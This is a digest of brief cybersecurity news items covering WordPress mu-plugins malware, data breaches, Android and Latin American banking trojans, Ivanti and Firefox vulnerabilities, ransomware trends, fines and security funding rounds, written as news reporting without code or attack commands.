Threat Actors Deploy WordPress Malware in ‘mu-plugins’ Directory
Sneaky hackers are targeting WordPress sites by stashing malware in the lesser-known ‘mu-plugins’ directory, a clever move to dodge standard security sweeps, warns Sucuri. Must-Use (MU) plugins auto-run on every page load, don’t need activation, and stay hidden from the usual plugin dashboard—making them a hacker’s dream hideout. Sucuri first spotted this trick in February with dodgy files like index.php and test-mu-plugin.php dropping backdoors. Now, they’ve uncovered more nasties—redirect.php, index.php, and custom-js-loader.php—that redirect users to malicious sites, spawn web shells for remote control, and inject spam. These files blend in by mimicking legit WordPress functions, but odd site behavior or unexplained server spikes are red flags. The redirect.php script even tailors its attack—serving fake browser updates to trick users into running code that steals data or plants more malware. Index.php fetches remote payloads, while custom-js-loader.php hijacks clicks with malicious popups. Sucuri suspects vulnerable plugins, weak credentials, or lax file permissions are entry points. WordPress admins, time to double-check that mu-plugins folder!
Zero to Hero – A “Measured” Approach to Building a World-Class Offensive Security Program
Want a top-tier offensive security program? Measure twice, cut once, says this deep dive into building resilience that lasts. Jumping straight to penetration tests or Red Teaming is tempting, but without a solid foundation, results won’t stick. This piece lays out a maturity “calculus” in three stages: Foundational (threat modeling, vuln management), Advanced (pen testing networks and apps), and Adversary Emulation (Red and Purple Teaming). Progress hinges on assessing coverage, cadence, and who’s running the show—do you have the people, processes, and tech to sustain it? Think OWASP SAMM frameworks and regular testing to keep pace with evolving threats. Start with threat modeling and attack surface visibility, then layer in vuln scans and pen tests, and finally flex your chops with full-on adversary sims. It’s not cheap—maturity demands cultural shifts and budget—but the payoff is a program that doesn’t just pass a test, it thrives under pressure. Missteps here aren’t as obvious as a botched construction cut; they could lurk undetected until a breach hits.
Hacker Leaks Samsung Customer Data
A hacker dubbed ‘GHNA’ just dumped 270,000 customer records allegedly swiped from Samsung Germany’s ticketing system, reports Hudson Rock. The breach traces back to stolen credentials from Spectos GmbH, a service quality firm, nabbed via a 2021 Racoon infostealer hit. Those creds sat dormant for years until this year, when GHNA used them to raid Samsung’s system, exposing names, addresses, emails, order details, and support chats. Hudson Rock warns this haul could fuel phishing, fraud, or even porch piracy. AI could supercharge the damage, crafting pinpoint phishing lures or fake support calls. Samsung’s yet to comment, but Hudson Rock pins the blame on sloppy credential hygiene—a recurring headache seen in breaches at Jaguar Land Rover and others. Infostealers are a ticking time bomb, and companies can’t just patch and hope; proactive credential hunting’s a must. For now, Samsung customers might want to keep an eye on their inboxes—and their front porches.
Part of EU’s New €1.3 Billion Investment Going to Cybersecurity
The European Commission just dropped a €1.3 billion ($1.4B) bombshell under its Digital Europe Programme for 2025-2027, and cybersecurity’s getting a juicy slice. Aimed at turbocharging digital tech across the EU, the funds will bolster cyber resilience—think EU Cybersecurity Reserve shielding hospitals and submarine cables from attacks. Cash will also flow into the Digital Identity Wallet rollout, promising tighter data protection and fraud busting. Beyond security, the investment’s juicing up gen-AI apps, digital innovation hubs, and skills training. This comes hot on the heels of EU sanctions against Russian and North Korean hackers targeting Estonia and aiding Ukraine’s war effort. The message? Europe’s doubling down on digital defenses as cyber threats loom larger. With critical infra in the crosshairs, this cash infusion could be a game-changer—if Ava spent right.
‘Crocodilus’ Android Banking Trojan Allows Device Takeover, Data Theft
Meet Crocodilus, the latest Android banking trojan giving fraud fighters at ThreatFabric nightmares. This beast packs remote control, keylogging, overlay attacks, and data harvesting, targeting users in Spain and Turkey. Dropped via a crafty app that sidesteps Android 13+ restrictions, it grabs Accessibility Services to seize control. Once in, it phones home to its C&C server for app targets and overlays, silently snagging creds while logging every tap. It even snipes Google Authenticator OTPs and, with remote access, can pull off fraudulent transactions. Crypto wallets? It tricks users into coughing up keys with fake backup prompts. Sneaky extras like black screen overlays and muted audio keep victims clueless. ThreatFabric ties it to a ‘sybra’ actor linked to Ermac and Octo malware, hinting at a Turkish dev behind the debug code. Android users, watch what you install!
CISA Analyzes Malware Used in Ivanti Zero-Day Attacks
CISA’s latest report unpacks the malware Chinese hackers wielded against an Ivanti Connect Secure zero-day (CVE-2025-0282), patched in January 2025. This nasty stack-based buffer overflow (CVSS 9.0) let attackers run code remotely, no login needed. Mandiant pegged exploitation to December 2024 by UNC5221, a China-linked espionage crew, dropping Spawn family malware—SpawnAnt, SpawnMole, and SpawnSnail. JPCERT/CC later spotted SpawnChimera, an evolved variant. CISA’s sample, dubbed Resurge, landed as ‘libdsupgrade.so’—a rootkit, dropper, backdoor, and more—hooking processes, setting up web shells, and tweaking logs with SpawnSloth. A third file, ‘dsmain’, leaned on BusyBox to fetch payloads. Ivanti users, patch up—this one’s a doozy.
170,000 Impacted by Data Breach at Chord Specialty Dental Partners
Chord Specialty Dental Partners, a Tennessee dental service outfit, just copped to a breach hitting over 173,000 people. Suspicious email activity in September 2024 led to the discovery of unauthorized access from August 18 to September 25. Compromised accounts held names, SSNs, medical info, and more. No misuse evidence yet, but Chord’s offering credit monitoring anyway. Reported to HHS, this joins a wave of email-based healthcare breaches—like Numotion’s 500K-hit incident. Dental patients, keep your guard up.
Critical Condition: Legacy Medical Devices Remain Easy Targets for Ransomware
Healthcare’s a ransomware magnet, and Claroty’s Team82 explains why: legacy medical devices are sitting ducks. Analyzing 2.25M IoMT and 647K OT devices across 351 orgs, they found 99% have exploitable flaws from CISA’s KEV list, with 20% tied to ransomware and internet-exposed. Patching’s a nightmare—FDA validation lags, and uptime trumps updates. Team82’s Venn triage (KEVs + ransomware + connectivity) cuts the noise, spotlighting 1,763 OT and 22,500 IoMT devices most at risk. A five-step fix—scope, discover, prioritize, validate, mobilize—offers hope, but healthcare’s attack surface needs urgent TLC.
9-Year-Old NPM Crypto Package Hijacked for Information Theft
Sonatype’s sounding the alarm: NPM packages for blockchain devs, some nine years old, got hijacked to sling info-stealing malware. With 500K lifetime downloads, packages like ‘bnb-javascript-sdk-nobroadcast’ and ‘country-currency-map’ rolled out malicious updates on NPM (GitHub untouched). Obfuscated scripts snag env vars—API keys, SSH creds, you name it. Old maintainer accounts, likely compromised via credential stuffing, are the culprits. NPM’s 2FA push in 2022 missed some, leaving gaps. Devs, check your dependencies!
Morphing Meerkat Phishing Kits Target Over 100 Brands
Infoblox unveils Morphing Meerkat, a PhaaS platform spoofing 114 brands with slick phishing kits. Using DNS MX records, it tailors fake login pages, hitting Gmail, Outlook, and more since 2020. Compromised WordPress sites, adtech redirects, and dynamic translation in 13+ languages make it a global menace. Pros at finance firms are prime targets, with creds harvested via email, PHP, or APIs. Morphing Meerkat’s centralized ops hint at a lone actor—watch those inbox links!
Fresh Grandoreiro Banking Trojan Campaigns Target Latin America, Europe
Grandoreiro’s back, hitting Latin America and Europe with phishing disguised as tax agency warnings, says Forcepoint. Active since 2016, this MaaS trojan’s survived takedowns, now targeting 1,700 banks and 276 crypto wallets globally. Obfuscated VB scripts and Delphi executables, hosted on legit services like Contabo and Mediafire, steal creds and scout Bitcoin dirs. Frequent subdomain swaps keep it slippery—users, skip those shady emails!
Firefox Affected by Flaw Similar to Chrome Zero-Day Exploited in Russia
Mozilla’s scrambling after finding Firefox has a flaw (CVE-2025-2857) mirroring Chrome’s zero-day (CVE-2025-2783), exploited in Russia since March. Kaspersky caught the Chrome bug in Operation ForumTroll, targeting Russian orgs with sandbox escapes. Firefox’s IPC bug, fixed in versions 136.0.4+, hits Windows users. No attacks on Firefox yet, but CISA’s KEV listing flags Chromium risks too. Update now!
Splunk Patches Dozens of Vulnerabilities
Splunk’s latest patch drop fixes heaps of flaws, including two high-severity bugs in Enterprise and Secure Gateway. CVE-2025-20229 (CVSS 8.0) lets low-priv users run code via file uploads, while another exposes tokens in logs. Medium and low issues hit maintenance, data manip, and third-party pkgs. No exploits yet—update to 9.4.1+ pronto!
Russian Espionage Group Using Ransomware in Attacks
RedCurl, a Russian espionage crew since 2018, is flipping the script with QWCrypt ransomware, says Bitdefender. Phishing with IMG-hosted SCR files sideloads DLLs, dropping hypervisor-targeting ransomware to cripple VMs. No extortion yet—just stealthy data theft. A gun-for-hire vibe suggests ransomware’s a decoy or Plan B. Low-profile ops keep them under the radar.
UK Software Firm Fined £3 Million Over Ransomware-Caused Data Breach
UK’s Advanced Computer Software Group got slapped with a £3M ($3.8M) ICO fine after a 2022 LockBit ransomware hit exposed 80K people’s data. No MFA on a customer account let hackers in, compromising NHS-linked home care details. A voluntary settlement, but a wake-up call: basics like MFA matter.
The Importance of Allyship for Women in Cyber
Mentorship boosts retention (72% vs. 49%) and morale (93% men, 83% women), says this piece spotlighting Viasat’s Taylor Pyle. From intern to Cyber Threat Intel lead, Pyle credits male allies like Damon Rouse for her rise. She pushes for early STEM exposure to get more women in tech—diverse leadership drives innovation.
GetReal Security Raises $17.5 Million to Tackle Gen-AI Threats
GetReal Security nabbed $17.5M in Series A cash from Forgepoint and others to fight AI-generated threats like deepfakes. Born from Ballistic Ventures and UC Berkeley’s Hany Farid, its platform verifies media and trains teams. Funds will boost R&D and market push—AI’s risks are spiking, and GetReal’s on it.
Defense Contractor MORSE to Pay $4.6M to Settle Cybersecurity Failure Allegations
MORSE Corp’s coughing up $4.6M to settle False Claims Act allegations over lax cybersecurity on Army and Air Force contracts. A whistleblower flagged NIST gaps and dodgy email security in 2023. No breaches, says MORSE, but the DOJ’s deal signals: secure that sensitive data or pay up.
Ransomware Groups Increasingly Adopting EDR Killer Tools
Ransomware gangs like RansomHub are arming up with EDR killers like EDRKillShifter, says ESET. Post-LockBit and BlackCat, affiliates share tools targeting security software via vulnerable drivers. Play, Medusa, and BianLian attacks hint at a ‘QuadSwitcher’ actor. EDR killers are trending as detection improves—encryptors stay static, but evasion’s evolving.
T-Mobile Coughed Up $33 Million in SIM Swap Lawsuit
T-Mobile’s shelling out $33M after a SIM swap attack drained $38M in crypto from Josh Jones in 2020, says Greenberg Glusker. A teen hacker exploited a backdoor, bypassing Jones’ 8-digit PIN. The sealed ruling raps T-Mobile’s security flops—carriers, tighten up, or face the music.
More Solar System Vulnerabilities Expose Power Grids to Hacking
Forescout’s dug up 46 new flaws in Sungrow, Growatt, and SMA solar gear, adding to 90+ known issues. From RCE to DoS, these bugs could let hackers destabilize grids or steal data. SMA and Sungrow patched; Growatt’s lagging. Solar’s critical—secure it like it matters.
AI Security Firm Straiker Emerges From Stealth With $21M in Funding
Straiker’s out of stealth with $21M from Lightspeed and Bain, tackling AI app risks like data leaks and prompt injections. Its Ascend AI tests threats; Defend AI blocks them. With LLM evasion and chaos in sight, Straiker’s engine customizes protection—AI security’s officially a priority.
